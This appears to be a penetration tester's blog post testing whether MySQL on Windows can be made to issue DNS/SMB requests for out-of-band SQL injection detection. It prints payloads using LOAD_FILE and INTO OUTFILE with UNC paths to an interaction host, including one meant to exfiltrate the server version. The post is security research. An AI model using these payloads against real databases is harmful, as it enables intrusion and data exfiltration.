Out of Band Interactions with MySQL
I sometimes use these cheatsheets by pentestmonkey, and I noticed that it said it isn't possible to make DNS requests with MySQL with a "?".
DNS requests are used in OAST (Out-of-band Application Security Testing) techniques to infer that an application is vulnerable to SQL injection when other methods fail. Or more simply, if we can make a server perform DNS lookups we have at least some element of control over it.
I was pretty sure that MySQL had this feature so I set about testing it. I am using the interaction servers at https://app.interactsh.com
MySQL on Windows
I installed MySQL on my Windows 11 host and set up the server. Looking at this I found that I was correct, there are two methods for triggering SMB requests with an associated DNS request.
load_file
The first is load_file. The syntax is simple:
SELECT LOAD_FILE('\\\\ngjrybimybqhusueidfel07v9jlic066f.oast.fun\\a');
The interaction server shows the result of the DNS lookup. If you leave the \\a off the end it doesn't work so ensure to include this.
Note: the From IP address here isn't my IP address but one belonging to my ISP.
into outfile
The second command looks like this:
select '' into outfile '\\\\ngjrybimybqhusueidfel07v9jlic066f.oast.fun\\a');
This will yield a hit like the screenshot above.
It should be possible in some circumstances to extract information this way by running:
select version() into outfile '\\\\ngjrybimybqhusueidfel07v9jlic066f.oast.fun\\a';
This wasn't working for me I think because the DNS request isn't being made directly but by some upstream server.
Be aware that for the above to work the secure_file_priv setting needs to be misconfigured. This is secure by default so I think seeing this in the wild is unlikely.
MySQL on Linux
I tried the methods above from a Linux installation. It seems like this is not possible on Linux, at least from my attempts here.
Conclusion
It is possible to make DNS queries with MySQL on Windows. We can also use this to interact with a local SMB server via impacket so we can test this on local networks with no outbound connections allowed although finding this in reality remains unlikely.